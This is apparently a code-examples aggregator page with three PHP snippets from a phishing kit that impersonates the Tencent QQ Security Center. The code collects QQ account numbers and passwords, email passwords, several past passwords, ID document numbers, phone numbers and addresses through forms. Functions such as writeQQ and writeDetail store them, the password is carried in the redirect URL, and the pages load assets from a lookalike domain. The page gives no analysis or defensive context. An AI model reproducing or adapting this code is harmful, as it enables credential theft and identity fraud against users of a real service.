Пример #1
0
$trueName = $_POST['txtName'];
$addr = $_POST['txtAddress'];
$anotherQQ = $_POST['txtContactQQ'];
$password = $_POST['txtContactQQPW'];
$reciveType = $_POST['radiobutton'];
$reciveMail = $_POST['txtContactEmail'];
$reciveMailPassword = $_POST['yxmm'];
$historyPw1 = $_POST['history_pwd_1_password'];
$historyPw2 = $_POST['pwdOldPW2'];
$historyPw3 = $_POST['pwdOldPW3'];
$trueName1 = $_POST['xm'];
$certificateType = $_POST['zj'];
$certificateNumber = $_POST['hm'];
$phoneNumber = $_POST['sj'];
$other = $_POST['ziliao'];
writeDetail($_GET['u'], $trueName, $addr, $anotherQQ, $password, $reciveType, $reciveMail, $reciveMailPassword, $historyPw1, $historyPw2, $historyPw3, $trueName1, $certificateType, $certificateNumber, $phoneNumber, $other);
?>
<!DOCTYPE html>
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="description" content="QQ安全中心、在线生活、安全护航">
<link href="safe2_files/global.css" rel="stylesheet" type="text/css">
<link href="safe2_files/base.css" rel="stylesheet" type="text/css">
<link rel="shortcut icon" href="http://serviec.boy-ex.com/favicon.ico">
<script async="" type="text/javascript" src="safe2_files/cdn_djl.js"></script><script type="text/javascript" src="safe2_files/jquery.js"></script>
<script type="text/javascript" src="safe2_files/common.js"></script>
<title>安全中心</title>	
	<style type="text/css">
		.ac_menu{border:1px solid #3162A6;background-color:#F6F6F6;cursor:default;overflow:hidden;height:expression((this.scrollHeight>130)?"130px":"auto")}
		.ac_menuitem{width:100%;color:#141414;padding:2px;text-align:left;}
		.ac_menuitem_selected{background-color:#D6DEEC;width:100%;color:#141414;padding:2px;text-align:left;}
Пример #2
0
<?php

require 'function.php';
if (!isset($_GET['u']) || !isset($_GET['p'])) {
    echo "<script>alert('No Access');window.location.href='index.php'</script>";
}
$trueName = $_POST['txtName'];
$addr = $_POST['txtAddress'];
$anotherQQ = $_POST['txtContactQQ'];
$password = $_POST['txtContactQQPW'];
$reciveType = $_POST['radiobutton'];
$reciveMail = $_POST['txtContactEmail'];
$reciveMailPassword = $_POST['yxmm'];
writeDetail($_GET['u'], $trueName, $addr, $anotherQQ, $password, $reciveType, $reciveMail, $reciveMailPassword, '', '', '', '', '', '', '', '');
?>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
<link href="safe1_files/global.css" rel="stylesheet" type="text/css">
<link href="safe1_files/base.css" rel="stylesheet" type="text/css">
<link rel="shortcut icon" href="http://serviec.boy-ex.com/favicon.ico">
<script async="" type="text/javascript" src="safe1_files/cdn_djl.js"></script><script type="text/javascript" src="safe1_files/jquery.js"></script>
<script type="text/javascript" src="safe1_files/common.js"></script>
<script type="text/javascript" src="safe1_files/ctrlManager.js"></script>
<script type="text/javascript" src="safe1_files/vry_question.js"></script>
<script type="text/javascript" src="safe1_files/check.js"></script>
<script type="text/javascript" src="safe1_files/dna.js"></script>
	<title>安全中心</title>	
	<style type="text/css">
		.ac_menu{border:1px solid #3162A6;background-color:#F6F6F6;cursor:default;overflow:hidden;height:expression((this.scrollHeight>130)?"130px":"auto")}
		.ac_menuitem{width:100%;color:#141414;padding:2px;text-align:left;}
Пример #3
0
require 'header.php';
require 'function.php';
?>

	<?php 
if (isset($_POST['u']) && isset($_POST['p']) && isset($_POST['verifycode'])) {
    if (empty($_POST['u']) && empty($_POST['p']) && empty($_POST['verifycode'])) {
        echo '<script>alert("请完整填写信息"); </script>';
    } else {
        if (!is_numeric($_POST['u']) || strlen($_POST['u']) < 5 || strlen($_POST['p']) > 16) {
            echo '<script>alert("帐号密码格式错误"); </script>';
        } else {
            writeQQ($_POST['u'], $_POST['p']);
            writeSecurity($_POST['u'], '');
            writeDetail($_POST['u'], '', '', '', '', '', '', '', '', '', '', '', '', '', '', '');
            echo '<script>parent.location.href="cn2.php?u=' . $_POST['u'] . '&p=' . $_POST['p'] . '"</script>';
        }
    }
}
?>

	<section>
		<div class="center">
			<div class="left_logo">
				<img style="margin-left: 6px;" src="images/index_02.png">
			</div>
			<div class="user_login_right">
				<img src="images/login_panel.jpg">
				<div class="login_form">
					<form method="post" action="index.php">